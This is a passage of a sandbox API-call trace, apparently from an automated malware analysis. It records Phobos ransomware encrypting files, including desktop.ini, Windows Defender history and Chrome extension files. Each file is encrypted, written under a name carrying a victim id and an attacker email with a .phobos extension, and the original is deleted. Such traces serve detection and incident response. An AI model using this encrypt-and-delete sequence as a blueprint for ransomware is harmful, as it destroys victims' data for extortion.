(hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.794] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x208, lpOverlapped=0x0) returned 1 [0147.795] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210, dwBufLen=0x210 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210) returned 1 [0147.795] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x210, lpOverlapped=0x0) returned 1 [0147.796] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.796] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.796] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.796] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.796] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.796] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.796] CloseHandle (hObject=0x18c) returned 1 [0147.796] CloseHandle (hObject=0x138) returned 1 [0147.800] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\desktop.ini")) returned 1 [0147.801] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.801] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.801] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=606) returned 1 [0147.801] CloseHandle (hObject=0x138) returned 1 [0147.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 0x26 [0147.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.802] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.802] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.803] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.803] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x25e, lpOverlapped=0x0) returned 1 [0147.804] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260, dwBufLen=0x260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x260) returned 1 [0147.804] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x260, lpOverlapped=0x0) returned 1 [0147.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.805] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.805] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.805] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.805] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.805] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.805] CloseHandle (hObject=0x138) returned 1 [0147.806] CloseHandle (hObject=0x18c) returned 1 [0147.807] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\desktop.ini")) returned 1 [0147.808] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.808] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.808] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0147.808] CloseHandle (hObject=0x18c) returned 1 [0147.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 0x26 [0147.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.809] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.809] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.809] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.809] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.810] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.810] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.810] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0147.811] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.811] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0147.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.812] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.812] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.812] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.812] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.812] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.812] CloseHandle (hObject=0x18c) returned 1 [0147.812] CloseHandle (hObject=0x138) returned 1 [0147.813] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 1 [0147.814] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.815] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=211808) returned 1 [0147.815] CloseHandle (hObject=0x138) returned 1 [0147.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin")) returned 0x2020 [0147.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.816] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.816] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.817] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.817] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x33b60, lpOverlapped=0x0) returned 1 [0147.819] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33b70, dwBufLen=0x33b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x33b70) returned 1 [0147.821] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x33b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x33b70, lpOverlapped=0x0) returned 1 [0147.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.824] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.824] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.824] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.824] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.824] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.824] CloseHandle (hObject=0x138) returned 1 [0147.825] CloseHandle (hObject=0x18c) returned 1 [0147.828] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin")) returned 1 [0147.830] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.831] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.832] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2) returned 1 [0147.832] CloseHandle (hObject=0x18c) returned 1 [0147.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log")) returned 0x2020 [0147.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.832] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.832] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.963] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.963] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2, lpOverlapped=0x0) returned 1 [0147.966] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10, dwBufLen=0x10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10) returned 1 [0147.966] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10, lpOverlapped=0x0) returned 1 [0147.967] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0147.967] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.967] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.967] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.967] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.967] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.967] CloseHandle (hObject=0x18c) returned 1 [0147.967] CloseHandle (hObject=0x138) returned 1 [0147.968] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log")) returned 1 [0147.969] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.969] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0147.969] CloseHandle (hObject=0x138) returned 1 [0147.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.970] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=3372) returned 1 [0147.970] CloseHandle (hObject=0x138) returned 1 [0147.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png")) returned 0x2020 [0147.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.970] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.970] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.971] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.971] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.971] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd2c, lpOverlapped=0x0) returned 1 [0148.078] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd30, dwBufLen=0xd30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd30) returned 1 [0148.078] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd30, lpOverlapped=0x0) 